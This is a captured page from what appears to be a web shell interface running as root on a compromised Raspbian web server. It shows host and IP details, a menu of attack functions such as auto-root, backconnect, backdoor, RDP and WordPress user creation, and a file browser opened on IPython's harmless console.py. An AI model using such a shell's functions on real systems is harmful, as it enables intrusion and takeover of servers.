Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
IPython /
terminal /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
pt_inputhooks
[ DIR ]
drwxr-xr-x
__init__.py
0
B
-rw-r--r--
console.py
691
B
-rw-r--r--
debugger.py
4.57
KB
-rw-r--r--
embed.py
14.85
KB
-rw-r--r--
interactiveshell.py
20.87
KB
-rw-r--r--
ipapp.py
13.86
KB
-rw-r--r--
magics.py
7.38
KB
-rw-r--r--
prompts.py
2.31
KB
-rw-r--r--
ptshell.py
296
B
-rw-r--r--
ptutils.py
4.14
KB
-rw-r--r--
shortcuts.py
6.81
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : console.py
""" Shim to maintain backwards compatibility with old IPython.terminal.console imports. """ # Copyright (c) IPython Development Team. # Distributed under the terms of the Modified BSD License. import sys from warnings import warn from IPython.utils.shimmodule import ShimModule, ShimWarning warn("The `IPython.terminal.console` package has been deprecated since IPython 4.0. " "You should import from jupyter_console instead.", ShimWarning) # Unconditionally insert the shim into sys.modules so that further import calls # trigger the custom attribute access above sys.modules['IPython.terminal.console'] = ShimModule( src='IPython.terminal.console', mirror='jupyter_console')
Close